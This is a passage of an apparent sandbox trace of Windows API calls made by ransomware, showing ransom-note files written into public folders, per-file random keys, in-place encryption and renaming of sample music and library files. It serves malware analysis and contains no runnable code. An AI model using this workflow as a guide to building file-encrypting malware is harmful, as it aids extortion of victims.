(lpString="DECRYPT-FILES.txt") returned 17 [0088.547] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Downloads\\\\DECRYPT-FILES.txt") returned 44 [0088.548] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\downloads\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.548] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.549] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Downloads\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0088.549] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Favorites\\\\jkbimi8.tmp") returned 38 [0088.549] CreateFileW (lpFileName="C:\\Users\\Public\\Favorites\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\favorites\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.550] lstrlenW (lpString="C:\\Users\\Public\\Favorites\\") returned 26 [0088.550] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.550] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Favorites\\\\DECRYPT-FILES.txt") returned 44 [0088.550] CreateFileW (lpFileName="C:\\Users\\Public\\Favorites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\favorites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.550] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.551] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Favorites\\" | out: lpString1="C:\\Users\\Public\\Favorites\\") returned="C:\\Users\\Public\\Favorites\\" [0088.552] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\Public\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0088.552] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Libraries\\\\jkbimi8.tmp") returned 38 [0088.552] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\libraries\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.552] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\") returned 26 [0088.552] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.552] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Libraries\\\\DECRYPT-FILES.txt") returned 44 [0088.552] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\libraries\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.554] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.555] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0088.555] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0088.556] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.556] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.556] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0088.557] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.557] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0088.558] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.558] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned 47 [0088.558] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.qsfUQT") returned 54 [0088.558] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.qsfUQT" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.qsfuqt"), dwFlags=0x0) returned 1 [0088.559] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Music\\\\jkbimi8.tmp") returned 34 [0088.559] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\music\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.559] lstrlenW (lpString="C:\\Users\\Public\\Music\\") returned 22 [0088.559] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.559] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Music\\\\DECRYPT-FILES.txt") returned 40 [0088.559] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.559] lstrlenW (lpString="C:\\Users\\Public\\Music\\") returned 22 [0088.559] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Music\\" | out: lpString1="C:\\Users\\Public\\Music\\") returned="C:\\Users\\Public\\Music\\" [0088.559] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\\\jkbimi8.tmp") returned 47 [0088.559] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\music\\sample music\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.561] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\") returned 35 [0088.561] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.562] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\\\DECRYPT-FILES.txt") returned 53 [0088.562] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\music\\sample music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.562] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.563] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0088.563] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0088.569] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfffffef8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.569] ReadFile (in: hFile=0x428, lpBuffer=0x3f2dd04, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x3f2dd00, lpOverlapped=0x0 | out: lpBuffer=0x3f2dd04*, lpNumberOfBytesRead=0x3f2dd00*=0x108, lpOverlapped=0x0) returned 1 [0088.571] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.571] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.571] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.571] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3f2dcf8*, pdwDataLen=0x3f2dce4*=0x28, dwBufLen=0x100 | out: pbData=0x3f2dcf8*, pdwDataLen=0x3f2dce4*=0x100) returned 1 [0088.605] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.606] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0088.608] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0088.626] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.626] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0088.629] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0088.655] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.655] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0088.657] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0088.675] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.675] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0088.677] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0088.704] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.705] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0088.707] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0088.727] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.727] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0088.730] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0088.741] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.742] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0088.744] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x100000, lpOverlapped=0x0) returned 1 [0088.756] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.756] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x100000, lpOverlapped=0x0) returned 1 [0088.758] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x64f1, lpOverlapped=0x0) returned 1 [0088.767] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffff9b0f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.767] WriteFile (in: hFile=0x428, lpBuffer=0x3f80000*, nNumberOfBytesToWrite=0x64f1, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f80000*, lpNumberOfBytesWritten=0x3f2dce0*=0x64f1, lpOverlapped=0x0) returned 1 [0088.767] ReadFile (in: hFile=0x428, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2dcdc, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2dcdc*=0x0, lpOverlapped=0x0) returned 1 [0088.767] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.767] WriteFile (in: hFile=0x428, lpBuffer=0x3f2dcf8*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2dce0, lpOverlapped=0x0 | out: lpBuffer=0x3f2dcf8*, lpNumberOfBytesWritten=0x3f2dce0*=0x108, lpOverlapped=0x0) returned 1 [0088.776] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.777] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 46 [0088.777] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.YF8Gf") returned 52 [0088.777] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3.YF8Gf" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3.yf8gf"), dwFlags=0x0) returned 1 [0088.777] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0088.779] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.779] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.779] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0088.917] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.917] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0088.918] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.919] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 64 [0088.919] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.vcz5je") returned 71 [0088.919] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.vcz5je" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.vcz5je"), dwFlags=0x0) returned 1 [0088.919] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\") returned="C:\\Users\\Public\\Music\\Sample Music\\" [0088.921] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.921] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.921] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.082] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.083] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.084] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0089.084] lstrlenW (lpString="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 49 [0089.084] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mw3Q") returned 54 [0089.084] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.mw3Q" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.mw3q"), dwFlags=0x0) returned 1 [0089.085] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Pictures\\\\jkbimi8.tmp") returned 37 [0089.085] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\pictures\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0089.085] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\") returned 25 [0089.085] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0089.085] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Pictures\\\\DECRYPT-FILES.txt") returned 43 [0089.085] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0089.085] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\") returned 25 [0089.085] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0089.086] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\\\jkbimi8.tmp") returned 53 [0089.086] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0089.090] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 41 [0089.090] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0089.090] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\\\DECRYPT-FILES.txt") returned 59 [0089.090] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\pictures\\sample pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0089.090] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0089.091] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0089.093] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0089.093] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0089.093] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0089.122] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.122] WriteFile (in: hFile=0x428, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0089.123] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: 